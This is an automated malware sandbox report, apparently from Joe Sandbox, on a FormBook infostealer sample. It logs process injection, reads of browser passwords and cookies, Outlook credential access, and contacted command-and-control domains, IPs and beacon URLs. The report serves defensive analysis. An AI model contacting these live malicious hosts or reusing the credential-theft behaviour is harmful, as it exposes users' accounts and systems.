Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtCreateMutant: Direct from: 0x776735CC	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Memory written: C:\Users\user\Desktop\zAg7xx1vKI.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: NULL target: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\cacls.exe

Thread register set: target process: 3208

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\cacls.exe

Thread APC queued: target process: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Process created: C:\Users\user\Desktop\zAg7xx1vKI.exe "C:\Users\user\Desktop\zAg7xx1vKI.exe"	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: vMBXKWKIWTv.exe, 00000005.00000000.1805385352.0000000001821000.00000002.00000001.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000005.00000002.2555021665.0000000001821000.00000002.00000001.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2555470518.0000000001211000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vMBXKWKIWTv.exe, 00000005.00000000.1805385352.0000000001821000.00000002.00000001.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000005.00000002.2555021665.0000000001821000.00000002.00000001.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2555470518.0000000001211000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: vMBXKWKIWTv.exe, 00000005.00000000.1805385352.0000000001821000.00000002.00000001.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000005.00000002.2555021665.0000000001821000.00000002.00000001.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2555470518.0000000001211000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: vMBXKWKIWTv.exe, 00000005.00000000.1805385352.0000000001821000.00000002.00000001.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000005.00000002.2555021665.0000000001821000.00000002.00000001.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2555470518.0000000001211000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Queries volume information: C:\Users\user\Desktop\zAg7xx1vKI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.zAg7xx1vKI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.zAg7xx1vKI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2554149849.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2555827665.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2554298777.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1882756009.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556015245.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1883972868.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\cacls.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.zAg7xx1vKI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.zAg7xx1vKI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2554149849.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2555827665.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2554298777.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1882756009.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556015245.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1883972868.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Services File Permissions Weakness	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Services File Permissions Weakness	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Timestomp	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 DLL Side-Loading	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zAg7xx1vKI.exe	71%	ReversingLabs	Win32.Backdoor.FormBook
zAg7xx1vKI.exe	82%	Virustotal		Browse
zAg7xx1vKI.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.golivenow.live	0%	Avira URL Cloud	safe
http://www.christinascuties.net/raea/?JHJt=itqtMr9H_JJ83L&nF=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp0E/jI7zxjpZO1XvGaBaxKF04Rir+eQ==	0%	Avira URL Cloud	safe
http://www.aktmarket.xyz/wb7v/?nF=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPegpUt0XvvntMHYRmRLx72hcusnuxA==&JHJt=itqtMr9H_JJ83L	0%	Avira URL Cloud	safe
http://www.golivenow.live/r2k9/	0%	Avira URL Cloud	safe
http://www.techmiseajour.net/jytl/	0%	Avira URL Cloud	safe
http://www.aktmarket.xyz/wb7v/	0%	Avira URL Cloud	safe
http://www.techmiseajour.net/jytl/?nF=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4EtQbsAD1NVMwB3NTJxV3YfkG6sDZmQ==&JHJt=itqtMr9H_JJ83L	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.aktmarket.xyz	13.248.169.48	true	false	high
iglpg.online	3.33.130.190	true	false	unknown
www.christinascuties.net	74.208.236.156	true	true	unknown
techmiseajour.net	84.32.84.32	true	true	unknown
www.golivenow.live	66.29.149.46	true	true	unknown
www.techmiseajour.net	unknown	unknown	false	unknown
www.iglpg.online	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.golivenow.live/r2k9/	true	Avira URL Cloud: safe	unknown
http://www.christinascuties.net/raea/?JHJt=itqtMr9H_JJ83L&nF=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp0E/jI7zxjpZO1XvGaBaxKF04Rir+eQ==	true	Avira URL Cloud: safe	unknown
http://www.techmiseajour.net/jytl/?nF=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4EtQbsAD1NVMwB3NTJxV3YfkG6sDZmQ==&JHJt=itqtMr9H_JJ83L	true	Avira URL Cloud: safe	unknown
http://www.techmiseajour.net/jytl/	true	Avira URL Cloud: safe	unknown
http://www.aktmarket.xyz/wb7v/	true	Avira URL Cloud: safe	unknown
http://www.aktmarket.xyz/wb7v/?nF=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPegpUt0XvvntMHYRmRLx72hcusnuxA==&JHJt=itqtMr9H_JJ83L	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	cacls.exe, 00000006.00000002.2558663459.0000000003DDA000.00000004.10000000.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2556655173.000000000347A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	cacls.exe, 00000006.00000002.2558663459.0000000003DDA000.00000004.10000000.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2556655173.000000000347A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.golivenow.live	vMBXKWKIWTv.exe, 00000009.00000002.2555827665.0000000002708000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.aktmarket.xyz	United States	16509	AMAZON-02US	false
84.32.84.32	techmiseajour.net	Lithuania	33922	NTT-LT-ASLT	true
66.29.149.46	www.golivenow.live	United States	19538	ADVANTAGECOMUS	true
74.208.236.156	www.christinascuties.net	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588661
Start date and time:	2025-01-11 03:48:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zAg7xx1vKI.exe renamed because original name is a hash value
Original Sample Name:	0a379ce2b635ae6c70c0893cf2ba64d653f9a0ac169c30b2dd49657ac422aecb.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@5/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 90 Number of non-executed functions: 282
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.109.210.53
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.

Simulations

Behavior and APIs

Time	Type	Description
21:48:56	API Interceptor	1x Sleep call for process: zAg7xx1vKI.exe modified
21:50:30	API Interceptor	93436x Sleep call for process: cacls.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	www.sfantulandrei.info/wvsm/
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	www.optimismbank.xyz/98j3/
	e47m9W6JGQ.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	www.shipley.group/wfhx/
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.autonomousoid.pro/m1if/
	fFoOcuxK7M.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	aBEh0fsi2c.exe	Get hash	malicious	FormBook	Browse	www.fortevision.xyz/dash/
	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	www.sfantulandrei.info/wvsm/
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	www.108.foundation/lnu5/
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/h8xm/
84.32.84.32	5by4QM3v89.exe	Get hash	malicious	FormBook	Browse	www.athanasopoulos.xyz/c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk
	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	www.sido247.pro/073p/?GF=mlOXG&IJQ=NsdLHLYUe9sblrm3UOGRvC4p7TYTQZr/4RSieCn+7DwPKByw7jhxCyN0LTJMQHRDPlmDRdKjKllFY9ccUXh84wh4P+Mkk2rH6R5Xw9P/6Vdw6OeNADfEYyY=
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.appsolucao.shop/qt4m/
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	www.absseguridad.online/3io6/
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	www.absseguridad.online/vekd/
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	www.promocao.info/zaz4/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.nosolofichas.online/hqr6/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.nosolofichas.online/hqr6/
	inv#12180.exe	Get hash	malicious	FormBook	Browse	www.promocao.info/zaz4/
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.promocao.info/iiuy/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.aktmarket.xyz	profroma invoice.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	purchase order.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	attached invoice.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	attached order.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	Fi#U015f.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	VSP469620.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.golivenow.live	profroma invoice.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	purchase order.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	attached invoice.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	attached order.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	66.29.149.46
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	66.29.149.46
www.christinascuties.net	profroma invoice.exe	Get hash	malicious	FormBook	Browse	74.208.236.156
	purchase order.exe	Get hash	malicious	FormBook	Browse	74.208.236.156
	attached invoice.exe	Get hash	malicious	FormBook	Browse	74.208.236.156
	attached order.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	74.208.236.156
	file.exe	Get hash	malicious	FormBook	Browse	74.208.236.156

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	5by4QM3v89.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	armv5l.elf	Get hash	malicious	Unknown	Browse	84.32.26.92
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	84.32.84.152
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
ONEANDONE-ASBrauerstrasse48DE	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	217.160.0.183
	gKvjKMCUfq.exe	Get hash	malicious	FormBook	Browse	217.160.0.113
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	77.68.64.45
	https://media.maxfs.de/	Get hash	malicious	Unknown	Browse	212.227.100.139
	miori.arm5.elf	Get hash	malicious	Unknown	Browse	217.174.247.149
	Onedrive Shared document.html	Get hash	malicious	HTMLPhisher	Browse	77.68.14.124
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	217.160.0.160
	https://www.boulderpeptide.org/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	74.208.236.22
	https://nutricarm.es/wp-templates/f8b83.php	Get hash	malicious	Unknown	Browse	212.227.149.251
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	104.192.6.92
ADVANTAGECOMUS	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	5by4QM3v89.exe	Get hash	malicious	FormBook	Browse	66.29.146.78
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	66.29.146.57
	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	7DpzcPcsTS.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	66.29.132.194
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	66.29.153.55
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
AMAZON-02US	1SxKeB4u0c.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	5.elf	Get hash	malicious	Unknown	Browse	157.175.218.227
	BzK8rQh2O3.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	18.163.74.139
	e47m9W6JGQ.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	18.163.74.139
	http://www.jadavisinjurylawyers.com/	Get hash	malicious	Unknown	Browse	54.231.128.160
	uG3I84bQEr.exe	Get hash	malicious	FormBook	Browse	18.141.10.107

Process:	C:\Users\user\Desktop\zAg7xx1vKI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
